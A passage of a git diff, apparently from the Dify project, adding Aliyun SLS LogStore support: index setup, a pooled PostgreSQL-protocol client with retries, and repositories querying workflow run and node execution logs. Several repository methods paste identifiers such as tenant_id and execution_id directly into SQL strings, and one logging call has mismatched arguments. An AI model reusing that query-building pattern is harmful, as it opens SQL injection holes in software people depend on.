for old, new in case_corrections[:5]]) + + ("..." if len(case_corrections) > 5 else ""), + ) + + # Create merged config + # key_config_list should be a dict, not a list + # Preserve the original scan_index value - don't force it to True + merged_config = IndexConfig( + line_config=existing_config.line_config + or IndexLineConfig(token_list=self.DEFAULT_TOKEN_LIST, case_sensitive=False, chinese=True), + key_config_list=existing_keys, + scan_index=existing_config.scan_index, + ) + + return merged_config, needs_update + + def ensure_index_config(self, logstore_name: str) -> None: + """ + Ensure index configuration includes all Dify-required fields. + + This method intelligently manages index configuration: + 1. If index doesn't exist, create it with Dify's required fields + 2. If index exists: + - Check if all Dify-required fields are present + - Check if field types match requirements + - Only update if fields are missing or types are incorrect + - Preserve any additional custom index configurations + + This approach allows users to add their own custom indexes without being overwritten. + """ + # Get Dify's required field indexes + required_keys = {} + if logstore_name == AliyunLogStore.workflow_execution_logstore: + required_keys = self._get_workflow_execution_index_keys() + elif logstore_name == AliyunLogStore.workflow_node_execution_logstore: + required_keys = self._get_workflow_node_execution_index_keys() + + # Check if index exists + existing_config = self.get_existing_index_config(logstore_name) + + if existing_config is None: + # Index doesn't exist, create it + logger.info( + "Logstore %s: Index doesn't exist, creating with %d required fields", + logstore_name, + len(required_keys), + ) + self.create_index(logstore_name) + else: + merged_config, needs_update = self._merge_index_configs(existing_config, required_keys, logstore_name) + + if needs_update: + logger.info("Logstore %s: Updating index to include Dify-required fields", logstore_name) + try: + self.client.update_index(self.project_name, logstore_name, merged_config) + logger.info( + "Logstore %s: Index updated successfully, now has %d total field indexes", + logstore_name, + len(merged_config.key_config_list or {}), + ) + except LogException as e: + logger.exception( + "Failed to update index for logstore %s: errorCode=%s, errorMessage=%s, requestId=%s", + logstore_name, + e.get_error_code(), + e.get_error_message(), + e.get_request_id(), + ) + raise + else: + logger.info( + "Logstore %s: Index already contains all %d Dify-required fields with correct types, " + "no update needed", + logstore_name, + len(required_keys), + ) + + def put_log(self, logstore: str, contents: Sequence[tuple[str, str]]) -> None: + # Route to PG or SDK based on protocol availability + if self._use_pg_protocol and self._pg_client: + self._pg_client.put_log(logstore, contents, self.log_enabled) + else: + log_item = LogItem(contents=contents) + request = PutLogsRequest(project=self.project_name, logstore=logstore, logitems=[log_item]) + + if self.log_enabled: + logger.info( + "[LogStore-SDK] PUT_LOG | logstore=%s | project=%s | items_count=%d", + logstore, + self.project_name, + len(contents), + ) + + try: + self.client.put_logs(request) + except LogException as e: + logger.exception( + "Failed to put logs to logstore %s: errorCode=%s, errorMessage=%s, requestId=%s", + logstore, + e.get_error_code(), + e.get_error_message(), + e.get_request_id(), + ) + raise + + def get_logs( + self, + logstore: str, + from_time: int, + to_time: int, + topic: str = "", + query: str = "", + line: int = 100, + offset: int = 0, + reverse: bool = True, + ) -> list[dict]: + request = GetLogsRequest( + project=self.project_name, + logstore=logstore, + fromTime=from_time, + toTime=to_time, + topic=topic, + query=query, + line=line, + offset=offset, + reverse=reverse, + ) + + # Log query info if SQLALCHEMY_ECHO is enabled + if self.log_enabled: + logger.info( + "[LogStore] GET_LOGS | logstore=%s | project=%s | query=%s | " + "from_time=%d | to_time=%d | line=%d | offset=%d | reverse=%s", + logstore, + self.project_name, + query, + from_time, + to_time, + line, + offset, + reverse, + ) + + try: + response = self.client.get_logs(request) + result = [] + logs = response.get_logs() if response else [] + for log in logs: + result.append(log.get_contents()) + + # Log result count if SQLALCHEMY_ECHO is enabled + if self.log_enabled: + logger.info( + "[LogStore] GET_LOGS RESULT | logstore=%s | returned_count=%d", + logstore, + len(result), + ) + + return result + except LogException as e: + logger.exception( + "Failed to get logs from logstore %s with query '%s': errorCode=%s, errorMessage=%s, requestId=%s", + logstore, + query, + e.get_error_code(), + e.get_error_message(), + e.get_request_id(), + ) + raise + + def execute_sql( + self, + sql: str, + logstore: str | None = None, + query: str = "*", + from_time: int | None = None, + to_time: int | None = None, + power_sql: bool = False, + ) -> list[dict]: + """ + Execute SQL query for aggregation and analysis. + + Args: + sql: SQL query string (SELECT statement) + logstore: Name of the logstore (required) + query: Search/filter query for SDK mode (default: "*" for all logs). + Only used in SDK mode. PG mode ignores this parameter. + from_time: Start time (Unix timestamp) - only used in SDK mode + to_time: End time (Unix timestamp) - only used in SDK mode + power_sql: Whether to use enhanced SQL mode (default: False) + + Returns: + List of result rows as dictionaries + + Note: + - PG mode: Only executes the SQL directly + - SDK mode: Combines query and sql as "query | sql" + """ + # Logstore is required + if not logstore: + raise ValueError("logstore parameter is required for execute_sql") + + # Route to PG or SDK based on protocol availability + if self._use_pg_protocol and self._pg_client: + # PG mode: execute SQL directly (ignore query parameter) + return self._pg_client.execute_sql(sql, logstore, self.log_enabled) + else: + # SDK mode: combine query and sql as "query | sql" + full_query = f"{query} | {sql}" + + # Provide default time range if not specified + if from_time is None: + from_time = 0 + + if to_time is None: + to_time = int(time.time()) # now + + request = GetLogsRequest( + project=self.project_name, + logstore=logstore, + fromTime=from_time, + toTime=to_time, + query=full_query, + ) + + # Log query info if SQLALCHEMY_ECHO is enabled + if self.log_enabled: + logger.info( + "[LogStore-SDK] EXECUTE_SQL | logstore=%s | project=%s | from_time=%d | to_time=%d | full_query=%s", + logstore, + self.project_name, + from_time, + to_time, + query, + sql, + ) + + try: + response = self.client.get_logs(request) + + result = [] + logs = response.get_logs() if response else [] + for log in logs: + result.append(log.get_contents()) + + # Log result count if SQLALCHEMY_ECHO is enabled + if self.log_enabled: + logger.info( + "[LogStore-SDK] EXECUTE_SQL RESULT | logstore=%s | returned_count=%d", + logstore, + len(result), + ) + + return result + except LogException as e: + logger.exception( + "Failed to execute SQL, logstore %s: errorCode=%s, errorMessage=%s, requestId=%s, full_query=%s", + logstore, + e.get_error_code(), + e.get_error_message(), + e.get_request_id(), + full_query, + ) + raise + + +if __name__ == "__main__": + aliyun_logstore = AliyunLogStore() + # aliyun_logstore.init_project_logstore() + aliyun_logstore.put_log(AliyunLogStore.workflow_execution_logstore, [("key1", "value1")]) diff --git a/api/extensions/logstore/aliyun_logstore_pg.py b/api/extensions/logstore/aliyun_logstore_pg.py new file mode 100644 index 0000000000..35aa51ce53 --- /dev/null +++ b/api/extensions/logstore/aliyun_logstore_pg.py @@ -0,0 +1,407 @@ +import logging +import os +import socket +import time +from collections.abc import Sequence +from contextlib import contextmanager +from typing import Any + +import psycopg2 +import psycopg2.pool +from psycopg2 import InterfaceError, OperationalError + +from configs import dify_config + +logger = logging.getLogger(__name__) + + +class AliyunLogStorePG: + """ + PostgreSQL protocol support for Aliyun SLS LogStore. + + Handles PG connection pooling and operations for regions that support PG protocol. + """ + + def __init__(self, access_key_id: str, access_key_secret: str, endpoint: str, project_name: str): + """ + Initialize PG connection for SLS. + + Args: + access_key_id: Aliyun access key ID + access_key_secret: Aliyun access key secret + endpoint: SLS endpoint + project_name: SLS project name + """ + self._access_key_id = access_key_id + self._access_key_secret = access_key_secret + self._endpoint = endpoint + self.project_name = project_name + self._pg_pool: psycopg2.pool.SimpleConnectionPool | None = None + self._use_pg_protocol = False + + def _check_port_connectivity(self, host: str, port: int, timeout: float = 2.0) -> bool: + """ + Check if a TCP port is reachable using socket connection. + + This provides a fast check before attempting full database connection, + preventing long waits when connecting to unsupported regions. + + Args: + host: Hostname or IP address + port: Port number + timeout: Connection timeout in seconds (default: 2.0) + + Returns: + True if port is reachable, False otherwise + """ + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(timeout) + result = sock.connect_ex((host, port)) + sock.close() + return result == 0 + except Exception as e: + logger.debug("Port connectivity check failed for %s:%d: %s", host, port, str(e)) + return False + + def init_connection(self) -> bool: + """ + Initialize PostgreSQL connection pool for SLS PG protocol support. + + Attempts to connect to SLS using PostgreSQL protocol. If successful, sets + _use_pg_protocol to True and creates a connection pool. If connection fails + (region doesn't support PG protocol or other errors), returns False. + + Returns: + True if PG protocol is supported and initialized, False otherwise + """ + try: + # Extract hostname from endpoint (remove protocol if present) + pg_host = self._endpoint.replace("http://", "").replace("https://", "") + + # Get pool configuration + pg_max_connections = int(os.environ.get("ALIYUN_SLS_PG_MAX_CONNECTIONS", 10)) + + logger.debug( + "Check PG protocol connection to SLS: host=%s, project=%s", + pg_host, + self.project_name, + ) + + # Fast port connectivity check before attempting full connection + # This prevents long waits when connecting to unsupported regions + if not self._check_port_connectivity(pg_host, 5432, timeout=1.0): + logger.info( + "USE SDK mode for read/write operations, host=%s", + pg_host, + ) + return False + + # Create connection pool + self._pg_pool = psycopg2.pool.SimpleConnectionPool( + minconn=1, + maxconn=pg_max_connections, + host=pg_host, + port=5432, + database=self.project_name, + user=self._access_key_id, + password=self._access_key_secret, + sslmode="require", + connect_timeout=5, + application_name=f"Dify-{dify_config.project.version}", + ) + + # Note: Skip test query because SLS PG protocol only supports SELECT/INSERT on actual tables + # Connection pool creation success already indicates connectivity + + self._use_pg_protocol = True + logger.info( + "PG protocol initialized successfully for SLS project=%s. Will use PG for read/write operations.", + self.project_name, + ) + return True + + except Exception as e: + # PG connection failed - fallback to SDK mode + self._use_pg_protocol = False + if self._pg_pool: + try: + self._pg_pool.closeall() + except Exception: + logger.debug("Failed to close PG connection pool during cleanup, ignoring") + self._pg_pool = None + + logger.info( + "PG protocol connection failed (region may not support PG protocol): %s. " + "Falling back to SDK mode for read/write operations.", + str(e), + ) + return False + + def _is_connection_valid(self, conn: Any) -> bool: + """ + Check if a connection is still valid. + + Args: + conn: psycopg2 connection object + + Returns: + True if connection is valid, False otherwise + """ + try: + # Check if connection is closed + if conn.closed: + return False + + # Quick ping test - execute a lightweight query + # For SLS PG protocol, we can't use SELECT 1 without FROM, + # so we just check the connection status + with conn.cursor() as cursor: + cursor.execute("SELECT 1") + cursor.fetchone() + return True + except Exception: + return False + + @contextmanager + def _get_connection(self): + """ + Context manager to get a PostgreSQL connection from the pool. + + Automatically validates and refreshes stale connections. + + Note: Aliyun SLS PG protocol does not support transactions, so we always + use autocommit mode. + + Yields: + psycopg2 connection object + + Raises: + RuntimeError: If PG pool is not initialized + """ + if not self._pg_pool: + raise RuntimeError("PG connection pool is not initialized") + + conn = self._pg_pool.getconn() + try: + # Validate connection and get a fresh one if needed + if not self._is_connection_valid(conn): + logger.debug("Connection is stale, marking as bad and getting a new one") + # Mark connection as bad and get a new one + self._pg_pool.putconn(conn, close=True) + conn = self._pg_pool.getconn() + + # Aliyun SLS PG protocol does not support transactions, always use autocommit + conn.autocommit = True + yield conn + finally: + # Return connection to pool (or close if it's bad) + if self._is_connection_valid(conn): + self._pg_pool.putconn(conn) + else: + self._pg_pool.putconn(conn, close=True) + + def close(self) -> None: + """Close the PostgreSQL connection pool.""" + if self._pg_pool: + try: + self._pg_pool.closeall() + logger.info("PG connection pool closed") + except Exception: + logger.exception("Failed to close PG connection pool") + + def _is_retriable_error(self, error: Exception) -> bool: + """ + Check if an error is retriable (connection-related issues). + + Args: + error: Exception to check + + Returns: + True if the error is retriable, False otherwise + """ + # Retry on connection-related errors + if isinstance(error, (OperationalError, InterfaceError)): + return True + + # Check error message for specific connection issues + error_msg = str(error).lower() + retriable_patterns = [ + "connection", + "timeout", + "closed", + "broken pipe", + "reset by peer", + "no route to host", + "network", + ] + return any(pattern in error_msg for pattern in retriable_patterns) + + def put_log(self, logstore: str, contents: Sequence[tuple[str, str]], log_enabled: bool = False) -> None: + """ + Write log to SLS using PostgreSQL protocol with automatic retry. + + Note: SLS PG protocol only supports INSERT (not UPDATE). This uses append-only + writes with log_version field for versioning, same as SDK implementation. + + Args: + logstore: Name of the logstore table + contents: List of (field_name, value) tuples + log_enabled: Whether to enable logging + + Raises: + psycopg2.Error: If database operation fails after all retries + """ + if not contents: + return + + # Extract field names and values from contents + fields = [field_name for field_name, _ in contents] + values = [value for _, value in contents] + + # Build INSERT statement with literal values + # Note: Aliyun SLS PG protocol doesn't support parameterized queries, + # so we need to use mogrify to safely create literal values + field_list = ", ".join([f'"{field}"' for field in fields]) + + if log_enabled: + logger.info( + "[LogStore-PG] PUT_LOG | logstore=%s | project=%s | items_count=%d", + logstore, + self.project_name, + len(contents), + ) + + # Retry configuration + max_retries = 3 + retry_delay = 0.1 # Start with 100ms + + for attempt in range(max_retries): + try: + with self._get_connection() as conn: + with conn.cursor() as cursor: + # Use mogrify to safely convert values to SQL literals + placeholders = ", ".join(["%s"] * len(fields)) + values_literal = cursor.mogrify(f"({placeholders})", values).decode("utf-8") + insert_sql = f'INSERT INTO "{logstore}" ({field_list}) VALUES {values_literal}' + cursor.execute(insert_sql) + # Success - exit retry loop + return + + except psycopg2.Error as e: + # Check if error is retriable + if not self._is_retriable_error(e): + # Not a retriable error (e.g., data validation error), fail immediately + logger.exception( + "Failed to put logs to logstore %s via PG protocol (non-retriable error)", + logstore, + ) + raise + + # Retriable error - log and retry if we have attempts left + if attempt < max_retries - 1: + logger.warning( + "Failed to put logs to logstore %s via PG protocol (attempt %d/%d): %s. Retrying...", + logstore, + attempt + 1, + max_retries, + str(e), + ) + time.sleep(retry_delay) + retry_delay *= 2 # Exponential backoff + else: + # Last attempt failed + logger.exception( + "Failed to put logs to logstore %s via PG protocol after %d attempts", + logstore, + max_retries, + ) + raise + + def execute_sql(self, sql: str, logstore: str, log_enabled: bool = False) -> list[dict[str, Any]]: + """ + Execute SQL query using PostgreSQL protocol with automatic retry. + + Args: + sql: SQL query string + logstore: Name of the logstore (for logging purposes) + log_enabled: Whether to enable logging + + Returns: + List of result rows as dictionaries + + Raises: + psycopg2.Error: If database operation fails after all retries + """ + if log_enabled: + logger.info( + "[LogStore-PG] EXECUTE_SQL | logstore=%s | project=%s | sql=%s", + logstore, + self.project_name, + sql, + ) + + # Retry configuration + max_retries = 3 + retry_delay = 0.1 # Start with 100ms + + for attempt in range(max_retries): + try: + with self._get_connection() as conn: + with conn.cursor() as cursor: + cursor.execute(sql) + + # Get column names from cursor description + columns = [desc[0] for desc in cursor.description] + + # Fetch all results and convert to list of dicts + result = [] + for row in cursor.fetchall(): + row_dict = {} + for col, val in zip(columns, row): + row_dict[col] = "" if val is None else str(val) + result.append(row_dict) + + if log_enabled: + logger.info( + "[LogStore-PG] EXECUTE_SQL RESULT | logstore=%s | returned_count=%d", + logstore, + len(result), + ) + + return result + + except psycopg2.Error as e: + # Check if error is retriable + if not self._is_retriable_error(e): + # Not a retriable error (e.g., SQL syntax error), fail immediately + logger.exception( + "Failed to execute SQL query on logstore %s via PG protocol (non-retriable error): sql=%s", + logstore, + sql, + ) + raise + + # Retriable error - log and retry if we have attempts left + if attempt < max_retries - 1: + logger.warning( + "Failed to execute SQL query on logstore %s via PG protocol (attempt %d/%d): %s. Retrying...", + logstore, + attempt + 1, + max_retries, + str(e), + ) + time.sleep(retry_delay) + retry_delay *= 2 # Exponential backoff + else: + # Last attempt failed + logger.exception( + "Failed to execute SQL query on logstore %s via PG protocol after %d attempts: sql=%s", + logstore, + max_retries, + sql, + ) + raise + + # This line should never be reached due to raise above, but makes type checker happy + return [] diff --git a/api/extensions/logstore/repositories/__init__.py b/api/extensions/logstore/repositories/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/extensions/logstore/repositories/logstore_api_workflow_node_execution_repository.py b/api/extensions/logstore/repositories/logstore_api_workflow_node_execution_repository.py new file mode 100644 index 0000000000..8c804d6bb5 --- /dev/null +++ b/api/extensions/logstore/repositories/logstore_api_workflow_node_execution_repository.py @@ -0,0 +1,365 @@ +""" +LogStore implementation of DifyAPIWorkflowNodeExecutionRepository. + +This module provides the LogStore-based implementation for service-layer +WorkflowNodeExecutionModel operations using Aliyun SLS LogStore. +""" + +import logging +import time +from collections.abc import Sequence +from datetime import datetime +from typing import Any + +from sqlalchemy.orm import sessionmaker + +from extensions.logstore.aliyun_logstore import AliyunLogStore +from models.workflow import WorkflowNodeExecutionModel +from repositories.api_workflow_node_execution_repository import DifyAPIWorkflowNodeExecutionRepository + +logger = logging.getLogger(__name__) + + +def _dict_to_workflow_node_execution_model(data: dict[str, Any]) -> WorkflowNodeExecutionModel: + """ + Convert LogStore result dictionary to WorkflowNodeExecutionModel instance. + + Args: + data: Dictionary from LogStore query result + + Returns: + WorkflowNodeExecutionModel instance (detached from session) + + Note: + The returned model is not attached to any SQLAlchemy session. + Relationship fields (like offload_data) are not loaded from LogStore. + """ + logger.debug("_dict_to_workflow_node_execution_model: data keys=%s", list(data.keys())[:5]) + # Create model instance without session + model = WorkflowNodeExecutionModel() + + # Map all required fields with validation + # Critical fields - must not be None + model.id = data.get("id") or "" + model.tenant_id = data.get("tenant_id") or "" + model.app_id = data.get("app_id") or "" + model.workflow_id = data.get("workflow_id") or "" + model.triggered_from = data.get("triggered_from") or "" + model.node_id = data.get("node_id") or "" + model.node_type = data.get("node_type") or "" + model.status = data.get("status") or "running" # Default status if missing + model.title = data.get("title") or "" + model.created_by_role = data.get("created_by_role") or "" + model.created_by = data.get("created_by") or "" + + # Numeric fields with defaults + model.index = int(data.get("index", 0)) + model.elapsed_time = float(data.get("elapsed_time", 0)) + + # Optional fields + model.workflow_run_id = data.get("workflow_run_id") + model.predecessor_node_id = data.get("predecessor_node_id") + model.node_execution_id = data.get("node_execution_id") + model.inputs = data.get("inputs") + model.process_data = data.get("process_data") + model.outputs = data.get("outputs") + model.error = data.get("error") + model.execution_metadata = data.get("execution_metadata") + + # Handle datetime fields + created_at = data.get("created_at") + if created_at: + if isinstance(created_at, str): + model.created_at = datetime.fromisoformat(created_at) + elif isinstance(created_at, (int, float)): + model.created_at = datetime.fromtimestamp(created_at) + else: + model.created_at = created_at + else: + # Provide default created_at if missing + model.created_at = datetime.now() + + finished_at = data.get("finished_at") + if finished_at: + if isinstance(finished_at, str): + model.finished_at = datetime.fromisoformat(finished_at) + elif isinstance(finished_at, (int, float)): + model.finished_at = datetime.fromtimestamp(finished_at) + else: + model.finished_at = finished_at + + return model + + +class LogstoreAPIWorkflowNodeExecutionRepository(DifyAPIWorkflowNodeExecutionRepository): + """ + LogStore implementation of DifyAPIWorkflowNodeExecutionRepository. + + Provides service-layer database operations for WorkflowNodeExecutionModel + using LogStore SQL queries with optimized deduplication strategies. + """ + + def __init__(self, session_maker: sessionmaker | None = None): + """ + Initialize the repository with LogStore client. + + Args: + session_maker: SQLAlchemy sessionmaker (unused, for compatibility with factory pattern) + """ + logger.debug("LogstoreAPIWorkflowNodeExecutionRepository.__init__: initializing") + self.logstore_client = AliyunLogStore() + + def get_node_last_execution( + self, + tenant_id: str, + app_id: str, + workflow_id: str, + node_id: str, + ) -> WorkflowNodeExecutionModel | None: + """ + Get the most recent execution for a specific node. + + Uses query syntax to get raw logs and selects the one with max log_version. + Returns the most recent execution ordered by created_at. + """ + logger.debug( + "get_node_last_execution: tenant_id=%s, app_id=%s, workflow_id=%s, node_id=%s", + tenant_id, + app_id, + workflow_id, + node_id, + ) + try: + # Check if PG protocol is supported + if self.logstore_client.supports_pg_protocol: + # Use PG protocol with SQL query (get latest version of each record) + sql_query = f""" + SELECT * FROM ( + SELECT *, + ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) as rn + FROM "{AliyunLogStore.workflow_node_execution_logstore}" + WHERE tenant_id = '{tenant_id}' + AND app_id = '{app_id}' + AND workflow_id = '{workflow_id}' + AND node_id = '{node_id}' + AND __time__ > 0 + ) AS subquery WHERE rn = 1 + LIMIT 100 + """ + results = self.logstore_client.execute_sql( + sql=sql_query, + logstore=AliyunLogStore.workflow_node_execution_logstore, + ) + else: + # Use SDK with LogStore query syntax + query = ( + f"tenant_id: {tenant_id} and app_id: {app_id} and workflow_id: {workflow_id} and node_id: {node_id}" + ) + from_time = 0 + to_time = int(time.time()) # now + + results = self.logstore_client.get_logs( + logstore=AliyunLogStore.workflow_node_execution_logstore, + from_time=from_time, + to_time=to_time, + query=query, + line=100, + reverse=False, + ) + + if not results: + return None + + # For SDK mode, group by id and select the one with max log_version for each group + # For PG mode, this is already done by the SQL query + if not self.logstore_client.supports_pg_protocol: + id_to_results: dict[str, list[dict[str, Any]]] = {} + for row in results: + row_id = row.get("id") + if row_id: + if row_id not in id_to_results: + id_to_results[row_id] = [] + id_to_results[row_id].append(row) + + # For each id, select the row with max log_version + deduplicated_results = [] + for rows in id_to_results.values(): + if len(rows) > 1: + max_row = max(rows, key=lambda x: int(x.get("log_version", 0))) + else: + max_row = rows[0] + deduplicated_results.append(max_row) + else: + # For PG mode, results are already deduplicated by the SQL query + deduplicated_results = results + + # Sort by created_at DESC and return the most recent one + deduplicated_results.sort( + key=lambda x: x.get("created_at", 0) if isinstance(x.get("created_at"), (int, float)) else 0, + reverse=True, + ) + + if deduplicated_results: + return _dict_to_workflow_node_execution_model(deduplicated_results[0]) + + return None + + except Exception: + logger.exception("Failed to get node last execution from LogStore") + raise + + def get_executions_by_workflow_run( + self, + tenant_id: str, + app_id: str, + workflow_run_id: str, + ) -> Sequence[WorkflowNodeExecutionModel]: + """ + Get all node executions for a specific workflow run. + + Uses query syntax to get raw logs and selects the one with max log_version for each node execution. + Ordered by index DESC for trace visualization. + """ + logger.debug( + "[LogStore] get_executions_by_workflow_run: tenant_id=%s, app_id=%s, workflow_run_id=%s", + tenant_id, + app_id, + workflow_run_id, + ) + try: + # Check if PG protocol is supported + if self.logstore_client.supports_pg_protocol: + # Use PG protocol with SQL query (get latest version of each record) + sql_query = f""" + SELECT * FROM ( + SELECT *, + ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) as rn + FROM "{AliyunLogStore.workflow_node_execution_logstore}" + WHERE tenant_id = '{tenant_id}' + AND app_id = '{app_id}' + AND workflow_run_id = '{workflow_run_id}' + AND __time__ > 0 + ) AS subquery WHERE rn = 1 + LIMIT 1000 + """ + results = self.logstore_client.execute_sql( + sql=sql_query, + logstore=AliyunLogStore.workflow_node_execution_logstore, + ) + else: + # Use SDK with LogStore query syntax + query = f"tenant_id: {tenant_id} and app_id: {app_id} and workflow_run_id: {workflow_run_id}" + from_time = 0 + to_time = int(time.time()) # now + + results = self.logstore_client.get_logs( + logstore=AliyunLogStore.workflow_node_execution_logstore, + from_time=from_time, + to_time=to_time, + query=query, + line=1000, # Get more results for node executions + reverse=False, + ) + + if not results: + return [] + + # For SDK mode, group by id and select the one with max log_version for each group + # For PG mode, this is already done by the SQL query + models = [] + if not self.logstore_client.supports_pg_protocol: + id_to_results: dict[str, list[dict[str, Any]]] = {} + for row in results: + row_id = row.get("id") + if row_id: + if row_id not in id_to_results: + id_to_results[row_id] = [] + id_to_results[row_id].append(row) + + # For each id, select the row with max log_version + for rows in id_to_results.values(): + if len(rows) > 1: + max_row = max(rows, key=lambda x: int(x.get("log_version", 0))) + else: + max_row = rows[0] + + model = _dict_to_workflow_node_execution_model(max_row) + if model and model.id: # Ensure model is valid + models.append(model) + else: + # For PG mode, results are already deduplicated by the SQL query + for row in results: + model = _dict_to_workflow_node_execution_model(row) + if model and model.id: # Ensure model is valid + models.append(model) + + # Sort by index DESC for trace visualization + models.sort(key=lambda x: x.index, reverse=True) + + return models + + except Exception: + logger.exception("Failed to get executions by workflow run from LogStore") + raise + + def get_execution_by_id( + self, + execution_id: str, + tenant_id: str | None = None, + ) -> WorkflowNodeExecutionModel | None: + """ + Get a workflow node execution by its ID. + Uses query syntax to get raw logs and selects the one with max log_version. + """ + logger.debug("get_execution_by_id: execution_id=%s, tenant_id=%s", execution_id, tenant_id) + try: + # Check if PG protocol is supported + if self.logstore_client.supports_pg_protocol: + # Use PG protocol with SQL query (get latest version of record) + tenant_filter = f"AND tenant_id = '{tenant_id}'" if tenant_id else "" + sql_query = f""" + SELECT * FROM ( + SELECT *, + ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) as rn + FROM "{AliyunLogStore.workflow_node_execution_logstore}" + WHERE id = '{execution_id}' {tenant_filter} AND __time__ > 0 + ) AS subquery WHERE rn = 1 + LIMIT 1 + """ + results = self.logstore_client.execute_sql( + sql=sql_query, + logstore=AliyunLogStore.workflow_node_execution_logstore, + ) + else: + # Use SDK with LogStore query syntax + if tenant_id: + query = f"id: {execution_id} and tenant_id: {tenant_id}" + else: + query = f"id: {execution_id}" + + from_time = 0 + to_time = int(time.time()) # now + + results = self.logstore_client.get_logs( + logstore=AliyunLogStore.workflow_node_execution_logstore, + from_time=from_time, + to_time=to_time, + query=query, + line=100, + reverse=False, + ) + + if not results: + return None + + # For PG mode, result is already the latest version + # For SDK mode, if multiple results, select the one with max log_version + if self.logstore_client.supports_pg_protocol or len(results) == 1: + return _dict_to_workflow_node_execution_model(results[0]) + else: + max_result = max(results, key=lambda x: int(x.get("log_version", 0))) + return _dict_to_workflow_node_execution_model(max_result) + + except Exception: + logger.exception("Failed to get execution by ID from LogStore: execution_id=%s", execution_id) + raise diff --git a/api/extensions/logstore/repositories/logstore_api_workflow_run_repository.py b/api/extensions/logstore/repositories/logstore_api_workflow_run_repository.py new file mode 100644 index 0000000000..252cdcc4df --- /dev/null +++ b/api/extensions/logstore/repositories/logstore_api_workflow_run_repository.py @@ -0,0 +1,757 @@ +""" +LogStore API WorkflowRun Repository Implementation + +This module provides the LogStore-based implementation of the APIWorkflowRunRepository +protocol. It handles service-layer WorkflowRun database operations using Aliyun SLS LogStore +with optimized queries for statistics and pagination. + +Key Features: +- LogStore SQL queries for aggregation and statistics +- Optimized deduplication using finished_at IS NOT NULL filter +- Window functions only when necessary (running status queries) +- Multi-tenant data isolation and security +""" + +import logging +import os +import time +from collections.abc import Sequence +from datetime import datetime +from typing import Any, cast + +from sqlalchemy.orm import sessionmaker + +from extensions.logstore.aliyun_logstore import AliyunLogStore +from libs.infinite_scroll_pagination import InfiniteScrollPagination +from models.enums import WorkflowRunTriggeredFrom +from models.workflow import WorkflowRun +from repositories.api_workflow_run_repository import APIWorkflowRunRepository +from repositories.types import ( + AverageInteractionStats, + DailyRunsStats, + DailyTerminalsStats, + DailyTokenCostStats, +) + +logger = logging.getLogger(__name__) + + +def _dict_to_workflow_run(data: dict[str, Any]) -> WorkflowRun: + """ + Convert LogStore result dictionary to WorkflowRun instance. + + Args: + data: Dictionary from LogStore query result + + Returns: + WorkflowRun instance + """ + logger.debug("_dict_to_workflow_run: data keys=%s", list(data.keys())[:5]) + # Create model instance without session + model = WorkflowRun() + + # Map all required fields with validation + # Critical fields - must not be None + model.id = data.get("id") or "" + model.tenant_id = data.get("tenant_id") or "" + model.app_id = data.get("app_id") or "" + model.workflow_id = data.get("workflow_id") or "" + model.type = data.get("type") or "" + model.triggered_from = data.get("triggered_from") or "" + model.version = data.get("version") or "" + model.status = data.get("status") or "running" # Default status if missing + model.created_by_role = data.get("created_by_role") or "" + model.created_by = data.get("created_by") or "" + + # Numeric fields with defaults + model.total_tokens = int(data.get("total_tokens", 0)) + model.total_steps = int(data.get("total_steps", 0)) + model.exceptions_count = int(data.get("exceptions_count", 0)) + + # Optional fields + model.graph = data.get("graph") + model.inputs = data.get("inputs") + model.outputs = data.get("outputs") + model.error = data.get("error_message") or data.get("error") + + # Handle datetime fields + started_at = data.get("started_at") or data.get("created_at") + if started_at: + if isinstance(started_at, str): + model.created_at = datetime.fromisoformat(started_at) + elif isinstance(started_at, (int, float)): + model.created_at = datetime.fromtimestamp(started_at) + else: + model.created_at = started_at + else: + # Provide default created_at if missing + model.created_at = datetime.now() + + finished_at = data.get("finished_at") + if finished_at: + if isinstance(finished_at, str): + model.finished_at = datetime.fromisoformat(finished_at) + elif isinstance(finished_at, (int, float)): + model.finished_at = datetime.fromtimestamp(finished_at) + else: + model.finished_at = finished_at + + # Compute elapsed_time from started_at and finished_at + # LogStore doesn't store elapsed_time, it's computed in WorkflowExecution domain entity + if model.finished_at and model.created_at: + model.elapsed_time = (model.finished_at - model.created_at).total_seconds() + else: + model.elapsed_time = float(data.get("elapsed_time", 0)) + + return model + + +class LogstoreAPIWorkflowRunRepository(APIWorkflowRunRepository): + """ + LogStore implementation of APIWorkflowRunRepository. + + Provides service-layer WorkflowRun database operations using LogStore SQL + with optimized query strategies: + - Use finished_at IS NOT NULL for deduplication (10-100x faster) + - Use window functions only when running status is required + - Proper time range filtering for LogStore queries + """ + + def __init__(self, session_maker: sessionmaker | None = None): + """ + Initialize the repository with LogStore client. + + Args: + session_maker: SQLAlchemy sessionmaker (unused, for compatibility with factory pattern) + """ + logger.debug("LogstoreAPIWorkflowRunRepository.__init__: initializing") + self.logstore_client = AliyunLogStore() + + # Control flag for dual-read (fallback to PostgreSQL when LogStore returns no results) + # Set to True to enable fallback for safe migration from PostgreSQL to LogStore + # Set to False for new deployments without legacy data in PostgreSQL + self._enable_dual_read = os.environ.get("LOGSTORE_DUAL_READ_ENABLED", "true").lower() == "true" + + def get_paginated_workflow_runs( + self, + tenant_id: str, + app_id: str, + triggered_from: WorkflowRunTriggeredFrom | Sequence[WorkflowRunTriggeredFrom], + limit: int = 20, + last_id: str | None = None, + status: str | None = None, + ) -> InfiniteScrollPagination: + """ + Get paginated workflow runs with filtering. + + Uses window function for deduplication to support both running and finished states. + + Args: + tenant_id: Tenant identifier for multi-tenant isolation + app_id: Application identifier + triggered_from: Filter by trigger source(s) + limit: Maximum number of records to return (default: 20) + last_id: Cursor for pagination - ID of the last record from previous page + status: Optional filter by status + + Returns: + InfiniteScrollPagination object + """ + logger.debug( + "get_paginated_workflow_runs: tenant_id=%s, app_id=%s, limit=%d, status=%s", + tenant_id, + app_id, + limit, + status, + ) + # Convert triggered_from to list if needed + if isinstance(triggered_from, WorkflowRunTriggeredFrom): + triggered_from_list = [triggered_from] + else: + triggered_from_list = list(triggered_from) + + # Build triggered_from filter + triggered_from_filter = " OR ".join([f"triggered_from='{tf.value}'" for tf in triggered_from_list]) + + # Build status filter + status_filter = f"AND status='{status}'" if status else "" + + # Build last_id filter for pagination + # Note: This is simplified. In production, you'd need to track created_at from 